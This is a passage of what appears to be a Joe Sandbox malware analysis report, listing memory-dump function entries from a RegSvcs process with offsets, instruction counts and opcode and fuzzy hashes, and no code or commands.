                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5bad9c0460b704cf95088deaf7bc6798ed42df9ff6e6c02aab34b0488b8691fd
                                                                        • Instruction ID: 352af9f86ae2b2fa16dfdb50f2909052bb690b1b99fe42a7d517e07771c976f5
                                                                        • Opcode Fuzzy Hash: 5bad9c0460b704cf95088deaf7bc6798ed42df9ff6e6c02aab34b0488b8691fd
                                                                        • Instruction Fuzzy Hash: B9615070F002099FEF549FA8C8547AEBAF6FB88714F208429E506EB395DE758C458B91
                                                                        Function 06E5FC20 Relevance: .2, Instructions: 173COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 466b9188e75a75e955ffd224f0ccd83c0d6c17b6bb1986c75914301cd6e89600
                                                                        • Instruction ID: 134676d7ee451452f5fc9c11e46045e690cedbb8251a74e8628e91a32ef1fe12
                                                                        • Opcode Fuzzy Hash: 466b9188e75a75e955ffd224f0ccd83c0d6c17b6bb1986c75914301cd6e89600
                                                                        • Instruction Fuzzy Hash: 8B519E71E012098FDB14EB78E4586ADB7B2EF88315F118979EA06DB290DB35CD45CF84
                                                                        Function 06E5F5C8 Relevance: .2, Instructions: 171COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 370abb596b287163aef299648edd8544883459db56b11b45f8343fc19e166ba5
                                                                        • Instruction ID: 90e6e4dad138ccd32d0057eb2ebb61818d307a3cdd311b22863a9b1230a5b38f
                                                                        • Opcode Fuzzy Hash: 370abb596b287163aef299648edd8544883459db56b11b45f8343fc19e166ba5
                                                                        • Instruction Fuzzy Hash: DD51D074B203158FFF64566CD89473E369EEB89714F21542AEA0AD33D1CA68CC818BD2
                                                                        Function 06E5F5D8 Relevance: .2, Instructions: 163COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1ead278c4d99ea160a80c725c28fa3a5c86288e088fd9f29b54254cd4a9e8c6e
                                                                        • Instruction ID: eb98818425500557692e984e2013415a448c9cd85fe15db56046727cce8a7777
                                                                        • Opcode Fuzzy Hash: 1ead278c4d99ea160a80c725c28fa3a5c86288e088fd9f29b54254cd4a9e8c6e
                                                                        • Instruction Fuzzy Hash: 1E51B174B203059FFF64566CD89473F365EEB89714F21542AEA0AE33D1C968CC818BD2
                                                                        Function 06E590DF Relevance: .2, Instructions: 155COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 167acca877afd236a1e1906879ab6d144ec93b553cd973ef5b030c31514188c4
                                                                        • Instruction ID: 459ca6a9f3a30c348c7b04f0a27c72f89d3abfd09e0be6cf7fa966f9be16fad4
                                                                        • Opcode Fuzzy Hash: 167acca877afd236a1e1906879ab6d144ec93b553cd973ef5b030c31514188c4
                                                                        • Instruction Fuzzy Hash: E2512E34B11256CFEB54DB74D950BAE73F6EF88240F10846AC80AEB355EE34DC028B95
                                                                        Function 06E55140 Relevance: .1, Instructions: 130COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d8c095236e0efe6125c95e440a433f32229d5c02e79f7e54867deb9936d2c522
                                                                        • Instruction ID: 71038255d9ba7e423e1faf876d7b61cf2eb0166ce087dc417a9f796a69ad4701
                                                                        • Opcode Fuzzy Hash: d8c095236e0efe6125c95e440a433f32229d5c02e79f7e54867deb9936d2c522
                                                                        • Instruction Fuzzy Hash: A9418678E103058FDF64CFA9C980B7EB7B2FB85314F21982AD916DB250D635E981CB91
                                                                        Function 06E54FC9 Relevance: .1, Instructions: 127COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 07727030a4c5c6ab1bc50b45a3d3cf37d928957d19a1cfe612ab8f779b47b346
                                                                        • Instruction ID: 57feefbd2e17287745023a15c5f8b668796e3bc10649cd19b30d1fbc7a9e7c90
                                                                        • Opcode Fuzzy Hash: 07727030a4c5c6ab1bc50b45a3d3cf37d928957d19a1cfe612ab8f779b47b346
                                                                        • Instruction Fuzzy Hash: 49416D71E007098FDF60CEA9D980AAFFBF1EB84318F11592AE656D7650D731E8498B90
                                                                        Function 06E5DA6D Relevance: .1, Instructions: 126COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ac7bc5152736228dc4313316bfc9b32f18e2a04cc15ab357da4900434e836ac3
                                                                        • Instruction ID: 6ec71afbb3d1f317b5df4362f84eb25b148b037c2365f90f12fc95840b5ef9f4
                                                                        • Opcode Fuzzy Hash: ac7bc5152736228dc4313316bfc9b32f18e2a04cc15ab357da4900434e836ac3
                                                                        • Instruction Fuzzy Hash: 06418F70E0030A9FEB61AFA5C8446AEBBB2FF85304F154429D805EB344EB74D846CB85
                                                                        Function 06E54710 Relevance: .1, Instructions: 126COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2cc16fdca36b6893f3dba286b191f2736c19f47c21a4d29c0ace1099a9ee1b97
                                                                        • Instruction ID: b4c6fb8ffd88bf29d8942b239e3acdc309d13f91497ce87096888456c7e7f23a
                                                                        • Opcode Fuzzy Hash: 2cc16fdca36b6893f3dba286b191f2736c19f47c21a4d29c0ace1099a9ee1b97
                                                                        • Instruction Fuzzy Hash: C4418070B102099FEB559FA4C854BAEBBF6FF88700F20852AE505EB394DF749C458B91
                                                                        Function 06E521AD Relevance: .1, Instructions: 109COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7333ea6f82786e44f4bd631235093feddec1a4560b169387ed4431a1e53e2943
                                                                        • Instruction ID: 3002755161adc33fac1da4f2d525851891100d29ef782ea5a7c081ba486365e3
                                                                        • Opcode Fuzzy Hash: 7333ea6f82786e44f4bd631235093feddec1a4560b169387ed4431a1e53e2943
                                                                        • Instruction Fuzzy Hash: 4D312074B043068FEB59AB78C4146AF7BA3EF89600F114868C902DB385EF35CE46CB91
                                                                        Function 06E521C0 Relevance: .1, Instructions: 105COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ccbecfc3043de3d718adc4eab1176ec998c22681c9a8f0f19c1a266817932376
                                                                        • Instruction ID: 164b228471425da035b61d733a37708146c5f16a4107357bd39c0258c88f9ff8
                                                                        • Opcode Fuzzy Hash: ccbecfc3043de3d718adc4eab1176ec998c22681c9a8f0f19c1a266817932376
                                                                        • Instruction Fuzzy Hash: 9331C074B1030A8FEB59AB74D41466F7BA3AF89604F214428D902DB395EF35DD42CBE1
                                                                        Function 06E52070 Relevance: .1, Instructions: 96COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: baf86c4986bad9bcf8f589f59d801d4e403aa9311940b7fa849900693e200269
                                                                        • Instruction ID: 423e78ecf1d5a8e442ce50cc6b53648dbfaa23c2e7e546c4b4557b7ae17e4dea
                                                                        • Opcode Fuzzy Hash: baf86c4986bad9bcf8f589f59d801d4e403aa9311940b7fa849900693e200269
                                                                        • Instruction Fuzzy Hash: 6E318D30E1025A8FDB59DFA4D8946AEB7B2EF89300F108519ED46EB350EB31ED46CB50
                                                                        Function 06E5D921 Relevance: .1, Instructions: 96COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 48a92abee5c2b0fac3917d5439cbbf4ed51a4554796e3d6e885d37e640ece0e6
                                                                        • Instruction ID: 40533f77fcb7e5d59c5e0a0da897668b25c8d9e1eadaf8b55e07c0c67fc1310c
                                                                        • Opcode Fuzzy Hash: 48a92abee5c2b0fac3917d5439cbbf4ed51a4554796e3d6e885d37e640ece0e6
                                                                        • Instruction Fuzzy Hash: 99317C70E1031A8FEF55DFA8C89469EB7B5FF85304F159929D905EB340EBB0E9468B80
                                                                        Function 06E52080 Relevance: .1, Instructions: 91COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b156b89928eb9d42daa23493ad11fd28e0eb34b945a6caa32fbcdd055999a101
                                                                        • Instruction ID: 049ecc3555689c00cbe8784f35da5c27c20e539f48ff723eef857819686331a4
                                                                        • Opcode Fuzzy Hash: b156b89928eb9d42daa23493ad11fd28e0eb34b945a6caa32fbcdd055999a101
                                                                        • Instruction Fuzzy Hash: B7315B30E1021A9FDB58DFA4D89469EB7B6AF89300F118519ED06EB350EB71ED46CB90
                                                                        Function 06E53A58 Relevance: .1, Instructions: 81COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 444564e5b9d9b4d5d69681ffb29db58f081ab5d4724012ee4fc65e6c9a07a419
                                                                        • Instruction ID: 4df87bd5d3a32096754cbcbcdfcf03e7c2fce399c25d6766e427f17533d1d17b
                                                                        • Opcode Fuzzy Hash: 444564e5b9d9b4d5d69681ffb29db58f081ab5d4724012ee4fc65e6c9a07a419
                                                                        • Instruction Fuzzy Hash: A6217C75F016099FEB40DFA9D881AAEBBF5EB48750F008169E909E7355E734ED008B90
                                                                        Function 06E53A68 Relevance: .1, Instructions: 78COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 875ad5aebe4e8e458a88a32b0c2f369bc17e7d9659e69ad6d96c3738bb7734ae
                                                                        • Instruction ID: d8da12a0926a7c78a407d0fb9cd7b89d17817841657dd114e26a9d34cb59b135
                                                                        • Opcode Fuzzy Hash: 875ad5aebe4e8e458a88a32b0c2f369bc17e7d9659e69ad6d96c3738bb7734ae
                                                                        • Instruction Fuzzy Hash: E9219875F016099FEB50DFA8D880AAEBBF1EB88340F108169E909E7395E734DD008B90
                                                                        Function 0139D030 Relevance: .1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2563647216.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_139d000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: af97affabac8fa0b7d8fa228c6c9c1fdcbe19e352f5c05d571c183b05169f8b4
                                                                        • Instruction ID: 5aa2fb49491e0eafd52079ef84c5e41fa2b2510a56014f5df16b22c0ce44b198
                                                                        • Opcode Fuzzy Hash: af97affabac8fa0b7d8fa228c6c9c1fdcbe19e352f5c05d571c183b05169f8b4
                                                                        • Instruction Fuzzy Hash: 0A2122B1504204DFDF11DF98D9C1B26BBA5FB84318F20C56DD9094B396C33AD447CA62
                                                                        Function 0139D118 Relevance: .1, Instructions: 71COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2563647216.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_139d000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b363fbcb1934ac0c752034db74f204bffb80e8ae2ec98e2cbc8d5ec2f1dbe7f9
                                                                        • Instruction ID: 9abc7b9ca82f5da1e112c7ad43423bc9ea7cc234b560dc667a3f111ba7b5e149
                                                                        • Opcode Fuzzy Hash: b363fbcb1934ac0c752034db74f204bffb80e8ae2ec98e2cbc8d5ec2f1dbe7f9
                                                                        • Instruction Fuzzy Hash: 122101B2604304DFDF45DF54D9C1B26BBA6FB84318F20C66DE90A4B296C33AD846CA61
                                                                        Function 06E53B78 Relevance: .1, Instructions: 59COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cfd66234bb9ecfbc2a0bb3e5c5582ab964224334ef00616e515c5cc71caebc5f
                                                                        • Instruction ID: a479c8262ba1fe7e93c88d31341d4d21f4c00505141c8dc5303aef3cc1e3a2b0
                                                                        • Opcode Fuzzy Hash: cfd66234bb9ecfbc2a0bb3e5c5582ab964224334ef00616e515c5cc71caebc5f
                                                                        • Instruction Fuzzy Hash: 75116136B101694FDF94AA79D818AEE77EAEBC8250F01457AD806EB344EE25DC018B91
                                                                        Function 06E53DB0 Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 466b15feb5b86517dc4286c3f653c8418c82135bc30578584c13409517cb6acb
                                                                        • Instruction ID: bf85cbffe95475578ab9c6cdde0aa63e95ba3ed2d18f721ee1004f8c094f24a4
                                                                        • Opcode Fuzzy Hash: 466b15feb5b86517dc4286c3f653c8418c82135bc30578584c13409517cb6acb
                                                                        • Instruction Fuzzy Hash: 3F017B35B002550BCB61967CD41436FB7EADFCA718F108439EA0AC7381EE21DC034B84
                                                                        Function 06E589B8 Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a48cd06ec03a131f55abe364dea78b4bf65e3c194877cc1c52e27e37998e694b
                                                                        • Instruction ID: 2ac2bc23ab8b11d8c82f73b841569e349090585fef1900bd415fbe297acfb599
                                                                        • Opcode Fuzzy Hash: a48cd06ec03a131f55abe364dea78b4bf65e3c194877cc1c52e27e37998e694b
                                                                        • Instruction Fuzzy Hash: 3411C830B102698BDFA4DB68D8507AE77A6EB81354F0044BAD909D73C1EB31DD418B92
                                                                        Function 06E5ED37 Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fa070f159da5a9815edfdd88bc86dcb70bbae6c399297581ee87177aa4d40a51
                                                                        • Instruction ID: 9e8587c65e838843eb3bbc94759d7a5810d1fe5eb5daf750f8caebee0a01f5e1
                                                                        • Opcode Fuzzy Hash: fa070f159da5a9815edfdd88bc86dcb70bbae6c399297581ee87177aa4d40a51
                                                                        • Instruction Fuzzy Hash: 9101DF31F101114BDFA5D67C989576EA3DADBC9314F11983AE90ACB380EE25DD038BD1
                                                                        Function 0139D02B Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2563647216.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_139d000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                                                        • Instruction ID: 92950aa416fcc1ccc5ee42fd8e2599eb4ce58bd6d185e0990b512c73bc8f8553
                                                                        • Opcode Fuzzy Hash: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                                                        • Instruction Fuzzy Hash: 0411BB76504284CFCB12CF58D9C4B15BFA1FB84318F28C6AAD8494B757C33AD44ACB62
                                                                        Function 06E53830 Relevance: .1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a19f9db3fdd71ad48a57a84642a40daa50ada3155eccbd0cae8d69d3163c71f4
                                                                        • Instruction ID: 2221bbb4e935b9b6967b2d9246aa2de7e689b585aa93492aae467cff408a1c36
                                                                        • Opcode Fuzzy Hash: a19f9db3fdd71ad48a57a84642a40daa50ada3155eccbd0cae8d69d3163c71f4
                                                                        • Instruction Fuzzy Hash: 7B21FFB5C002199FDB00CF9AD984BDEFBB4FB48314F10812AE918A7240D378A954CFA5
                                                                        Function 06E53838 Relevance: .1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ece294084efb5de3ad71e5cb8deccf6c5ffe0b97b575c3320023fe4fa2975a8f
                                                                        • Instruction ID: d921f5029b52e85765b2648a151e5231f744a9205bf57d4955bf15c759456296
                                                                        • Opcode Fuzzy Hash: ece294084efb5de3ad71e5cb8deccf6c5ffe0b97b575c3320023fe4fa2975a8f
                                                                        • Instruction Fuzzy Hash: A911B0B5D01259AFDB00CF9AD884ADEFBB4FB48724F10812AE918A7340D374A954CFA5
                                                                        Function 0139D113 Relevance: .1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2563647216.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_139d000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 571ae3314b5eab4f3956dd8972c21c0340599e146b22899774add593c253268d
                                                                        • Instruction ID: eac73f1f10fb138cd40a22246e8afdeaeaacbe846dcfda0bb7a8d019e4dd6f4b
                                                                        • Opcode Fuzzy Hash: 571ae3314b5eab4f3956dd8972c21c0340599e146b22899774add593c253268d
                                                                        • Instruction Fuzzy Hash: A811BFB6504284CFDB06CF54D9C4B15BFB2FB84318F24C6ADD8494B656C33AD44ACB51
                                                                        Function 06E53B69 Relevance: .1, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: abaa82f2ecfa2905c785a7261bc89e3add81f7ca3f748fcc5138e1c1c198c8c4
                                                                        • Instruction ID: 8ccb0fbb0765532de26cff4364e5c39b0805c8a9e434028435a868e16d5aeaac
                                                                        • Opcode Fuzzy Hash: abaa82f2ecfa2905c785a7261bc89e3add81f7ca3f748fcc5138e1c1c198c8c4
                                                                        • Instruction Fuzzy Hash: 84018436B101594BDB94E9A9DC14AEE77EEDBC8650F01403AD90AE7244FE24DD058791
                                                                        Function 06E53DC0 Relevance: .1, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 41920204746060f9d7bc70f94b44cfc6b61fc28260263c4e1fce941b032beb2f
                                                                        • Instruction ID: d7f7bd6b73d4d635dab255dc8b964b460fc27d5be380670f08a0d7ae1bb95df8
                                                                        • Opcode Fuzzy Hash: 41920204746060f9d7bc70f94b44cfc6b61fc28260263c4e1fce941b032beb2f
                                                                        • Instruction Fuzzy Hash: DA01F435B102150BDBA0966DD45472FB3DAEBCA754F208439EA0BC7380FE65EC030795
                                                                        Function 06E5A2A8 Relevance: .0, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 44058421a78d51048fad1ad2d18ef50dbc96f6ee95e8cdd11117c1c7562a525d
                                                                        • Instruction ID: 98542dd8acb6a6833d6fc02ae789cf78b35bf8cc52ddfae4dedbc00e56f0946f
                                                                        • Opcode Fuzzy Hash: 44058421a78d51048fad1ad2d18ef50dbc96f6ee95e8cdd11117c1c7562a525d
                                                                        • Instruction Fuzzy Hash: 9101FC347102054FE760DA7CE85571E7BE5DB89718F10547DEA0ACB351EE15EC028784
                                                                        Function 06E5ED48 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0237f85f3fdbff4d5e15a8955523c2d52e727d15b84157315b198e71b27ff9e4
                                                                        • Instruction ID: a23980419dd7ec83506bde967535658d7fe4e2603190d6daf3f1ea2e4d8dbb2f
                                                                        • Opcode Fuzzy Hash: 0237f85f3fdbff4d5e15a8955523c2d52e727d15b84157315b198e71b27ff9e4
                                                                        • Instruction Fuzzy Hash: 0E01A431B101150BDBA5967C985472EB7DAD7C9724F109839ED0ACB380EE25DD434B95
                                                                        Function 06E5A2B8 Relevance: .0, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f2dd9bd091702b2a69e3ac63017b5992a889150107ef65b65c7b7449207dc13f
                                                                        • Instruction ID: 491a2482a4f2e24a539a734c751c879470b92ba470e11c11d2228e11863932b2
                                                                        • Opcode Fuzzy Hash: f2dd9bd091702b2a69e3ac63017b5992a889150107ef65b65c7b7449207dc13f
                                                                        • Instruction Fuzzy Hash: 1301A434B102154FEBA4DA6CE85572E77DAEB89718F10953CEA0ACB350EE25EC028784
                                                                        Function 06E5C790 Relevance: .0, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
